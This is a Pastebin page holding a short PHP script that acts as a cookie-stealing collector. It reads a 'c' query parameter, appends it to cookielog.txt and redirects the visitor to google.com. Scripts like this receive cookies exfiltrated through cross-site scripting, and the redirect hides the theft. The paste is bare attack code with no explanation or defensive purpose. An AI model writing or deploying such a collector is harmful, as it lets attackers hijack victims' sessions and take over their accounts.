Advertisement
Guest User

Untitled

a guest
Mar 28th, 2017
46
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.18 KB | None | 0 0
  1. <?php
  2.  
  3. $cookie = $HTTP_GET_VARS[" c"];
  4. $file = fopen('cookielog.txt', 'a');
  5. fwrite($file, $cookie . "\n\n");
  6. echo " <script>location.href='http://www.google.com';</script>";
  7.  
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement